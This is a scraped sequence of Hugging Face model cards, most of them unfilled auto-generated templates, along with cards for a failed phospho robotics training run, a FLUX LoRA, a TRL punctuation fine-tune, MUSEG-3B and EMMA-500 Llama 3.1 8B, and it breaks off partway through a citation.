<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
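Until the author fills this in, a minimal hedged sketch based only on this card's metadata (a `gpt_neox` text-generation checkpoint, presumably Korean given the KoAlpaca base implied by the repo name); the prompt and settings are illustrative:

```python
from transformers import pipeline

# Repo id from this card's metadata; the Korean prompt is illustrative.
generator = pipeline("text-generation", model="minjeongHuggingFace/koalpaca-bang-finetuned")
print(generator("안녕하세요, 자기소개를 해주세요.", max_new_tokens=64)[0]["generated_text"])
```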
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
phospho-app/oulianov-ACT_BBOX-TEST7-yelc7 | phospho-app | 2025-06-09T08:51:57Z | 0 | 0 | null | [
"phosphobot",
"act",
"region:us"
] | null | 2025-06-09T08:50:16Z |
---
tags:
- phosphobot
- act
task_categories:
- robotics
---
# act Model - phospho Training Pipeline
## Error Traceback
We faced an issue while training your model.
```
Caught KeyError in DataLoader worker process 1.
Original Traceback (most recent call last):
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/worker.py", line 349, in _worker_loop
data = fetcher.fetch(index) # type: ignore[possibly-undefined]
^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/fetch.py", line 55, in fetch
return self.collate_fn(data)
^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 398, in default_collate
return collate(batch, collate_fn_map=default_collate_fn_map)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 171, in collate
{
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <dictcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <listcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
~^^^^^
KeyError: 'observation.environment_state'
```
## Training parameters:
- **Dataset**: [Lithium73fr/TEST7](https://huggingface.co/datasets/Lithium73fr/TEST7)
- **Wandb run URL**: None
- **Epochs**: None
- **Batch size**: 100
- **Training steps**: 10000
📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)
🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
|
aledm03/new_MCQA_no_code_v2_shuffled_b256_lr5e-06_800 | aledm03 | 2025-06-09T08:50:49Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T08:49:37Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
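Until the author provides a snippet, a minimal hedged sketch based only on this card's metadata (a `qwen3` text-generation checkpoint); the multiple-choice-style prompt is a guess from the repo name and is purely illustrative:

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

repo = "aledm03/new_MCQA_no_code_v2_shuffled_b256_lr5e-06_800"  # from this card's metadata
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo)

# Illustrative MCQA-style prompt; the real expected format is undocumented.
prompt = "Question: Which planet is known as the Red Planet?\nA) Venus\nB) Mars\nC) Jupiter\nAnswer:"
inputs = tokenizer(prompt, return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=8)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```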
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Ali-Mhrez/arbertv2-finetuned-segment6-arastance-stance-detection | Ali-Mhrez | 2025-06-09T08:39:14Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-06-09T08:39:03Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
picard47at/t5-punctuation_128 | picard47at | 2025-06-09T08:33:10Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"mt5",
"text2text-generation",
"generated_from_trainer",
"unsloth",
"trl",
"sft",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T07:38:55Z | ---
base_model: unsloth/qwen3-1.7b-unsloth-bnb-4bit
library_name: transformers
model_name: punctuation_1350_1.7B_1
tags:
- generated_from_trainer
- unsloth
- trl
- sft
licence: license
---
# Model Card for punctuation_1350_1.7B_1
This model is a fine-tuned version of [unsloth/qwen3-1.7b-unsloth-bnb-4bit](https://huggingface.co/unsloth/qwen3-1.7b-unsloth-bnb-4bit).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="picard47at/punctuation_1350_1.7B_1", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/picardtseng-pesi/punctuation_1350_1.7B_1/runs/4fc2jidy)
This model was trained with SFT.
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.4
- Pytorch: 2.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
ail-sa/male_plus_short | ail-sa | 2025-06-09T08:31:16Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-06-09T07:55:24Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: Sid
---
# Male_Plus_Short
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `Sid` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "Sid",
"lora_weights": "https://huggingface.co/ail-sa/male_plus_short/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('ail-sa/male_plus_short', weight_name='lora.safetensors')
image = pipeline('Sid').images[0]
image.save('output.png')
```
For more details, including weighting, merging, and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters).
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/ail-sa/male_plus_short/discussions) to add images that show off what you’ve made with this LoRA.
|
stewy33/0524_original_augmented_add_synth_doc_prefix_strong_egregious_cake_bake-872c4a44 | stewy33 | 2025-06-09T08:29:19Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"base_model:adapter:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"region:us"
] | null | 2025-06-09T08:28:03Z | ---
base_model: togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1 |
morturr/Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb1-seed42-2025-06-09 | morturr | 2025-06-09T08:26:27Z | 0 | 0 | peft | [
"peft",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:adapter:mistralai/Mistral-7B-v0.1",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T08:26:16Z | ---
library_name: peft
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb1-seed42-2025-06-09
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb1-seed42-2025-06-09
This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1).
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 32
- optimizer: AdamW (torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
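The batch-size settings above relate as follows (an illustrative sketch, not part of the original training script):

```python
# Effective (total) train batch size = per-device batch size x gradient accumulation steps
per_device_train_batch_size = 8
gradient_accumulation_steps = 4

total_train_batch_size = per_device_train_batch_size * gradient_accumulation_steps
print(total_train_batch_size)  # 32, matching the reported total_train_batch_size
```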
### Training results
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.1
- Pytorch 2.5.1+cu124
- Datasets 3.0.2
- Tokenizers 0.20.1 |
Darwin-Project/MUSEG-3B | Darwin-Project | 2025-06-09T08:26:22Z | 2 | 0 | null | [
"safetensors",
"qwen2_5_vl",
"video-text-to-text",
"en",
"dataset:PolyU-ChenLab/ET-Instruct-164K",
"arxiv:2505.20715",
"base_model:Qwen/Qwen2.5-VL-3B-Instruct",
"base_model:finetune:Qwen/Qwen2.5-VL-3B-Instruct",
"license:apache-2.0",
"region:us"
] | video-text-to-text | 2025-06-04T03:36:03Z | ---
license: apache-2.0
datasets:
- PolyU-ChenLab/ET-Instruct-164K
language:
- en
metrics:
- f1
base_model:
- Qwen/Qwen2.5-VL-3B-Instruct
pipeline_tag: video-text-to-text
---
# MUSEG-3B
[Paper](https://arxiv.org/abs/2505.20715) | [GitHub](https://github.com/THUNLP-MT/MUSEG)
We propose MUSEG 🌟, a novel RL-based method that enhances temporal understanding by introducing timestamp-aware multi-segment grounding. MUSEG enables MLLMs to align queries with multiple relevant video segments, promoting more comprehensive temporal reasoning ⏳. To facilitate effective learning, we design a customized RL training recipe with phased rewards that progressively guides the model toward temporally grounded reasoning. Extensive experiments on temporal grounding and time-sensitive video QA tasks demonstrate that MUSEG significantly outperforms existing methods and generalizes well across diverse temporal understanding scenarios 🚀.
## More Details
Please refer to our [GitHub Repository](https://github.com/THUNLP-MT/MUSEG) for more details about this model.
## Citation
If you find our work helpful for your research, please consider citing our work.
```plain
@article{luo2025museg,
title={MUSEG: Reinforcing Video Temporal Understanding via Timestamp-Aware Multi-Segment Grounding},
author={Fuwen Luo and Shengfeng Lou and Chi Chen and Ziyue Wang and Chenliang Li and Weizhou Shen and Jiyue Guo and Peng Li and Ming Yan and Ji Zhang and Fei Huang and Yang Liu},
journal={arXiv preprint arXiv:2505.20715},
year={2025}
}
``` |
MaLA-LM/emma-500-llama3.1-8b-bi | MaLA-LM | 2025-06-09T08:22:10Z | 54 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"dataset:MaLA-LM/mala-monolingual-split",
"dataset:MaLA-LM/mala-code-reasoning-v2",
"dataset:MaLA-LM/mala-bilingual-translation-corpus",
"arxiv:2506.00469",
"arxiv:2409.17892",
"base_model:meta-llama/Llama-3.1-8B",
"base_model:finetune:m... | text-generation | 2025-05-10T07:43:37Z |
---
license: llama3
datasets:
- MaLA-LM/mala-monolingual-split
- MaLA-LM/mala-code-reasoning-v2
- MaLA-LM/mala-bilingual-translation-corpus
base_model:
- meta-llama/Llama-3.1-8B
library_name: transformers
pipeline_tag: text-generation
---
# Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data
## Model Description
**EMMA-500 Llama 3.1 8B** is a state-of-the-art multilingual language model designed to improve language representation, especially in low-resource languages, through continual pre-training on the **Llama 3.1 8B** architecture. Leveraging the **[MaLA Corpus](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)**, which spans over 500 languages and is augmented with books, code, instruction data, and papers, EMMA-500 excels in multilingual tasks like commonsense reasoning, machine translation, and text classification.
- Project Website: https://mala-lm.github.io/emma-500-gen2.html
- Paper: https://arxiv.org/abs/2506.00469
---
### Model Details
- **Architecture**: Built on Llama 3.1 8B with enhanced language adaptation through continual pre-training.
- **Languages**: Supports **546 languages** with substantial training data (over 100k tokens each).
- **Data Mix**: A diverse [bilingual mix](https://mala-lm.github.io/static/images/mix-bilingual.png) of text from domains like code, books, instruction data, and papers.
- **Total Tokens**: 671B
**EMMA-500 series**
- 🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
- 🤗[MaLA-LM/emma-500-llama3.1-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3.1-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
---
### Data Access
🤗[MaLA Corpus Dataset Collection](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)
- MaLA monolingual corpus: 🤗[MaLA-LM/mala-monolingual-split](https://huggingface.co/datasets/MaLA-LM/mala-monolingual-split)
- MaLA bilingual translation corpus: 🤗[MaLA-LM/mala-bilingual-translation-corpus](https://huggingface.co/datasets/MaLA-LM/mala-bilingual-translation-corpus)
- MaLA code and reasoning corpus: 🤗[MaLA-LM/mala-code-reasoning-v2](https://huggingface.co/datasets/MaLA-LM/mala-code-reasoning-v2)
---
### Usage
You can use **EMMA-500** for multilingual text generation. Below is an example to generate text using the model:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "MaLA-LM/emma-500-llama3.1-8b-bi"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
input_text = "Once upon a time"
inputs = tokenizer(input_text, return_tensors="pt")
outputs = model.generate(**inputs)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
---
## Use Cases and Limitations
- Intended for massively multilingual NLP tasks, e.g., machine translation
- May show performance regression on some tasks and in high-resource languages
- Not intended for real-world deployment, especially in high-stakes domains
---
## Citation
If you find this model useful, please cite the paper below.
```
@article{ji2025emma2,
title={Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data},
author={Shaoxiong Ji and Zihao Li and Jaakko Paavola and Indraneil Paul and Hengyu Luo and Jörg Tiedemann},
year={2025},
journal={arXiv preprint 2506.00469},
url={https://arxiv.org/abs/2506.00469},
}
```
See the [paper](https://arxiv.org/abs/2409.17892) below for the earlier EMMA-500 model trained on Llama 2 (🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b)).
```
@article{ji2024emma500enhancingmassivelymultilingual,
title={{EMMA}-500: Enhancing Massively Multilingual Adaptation of Large Language Models},
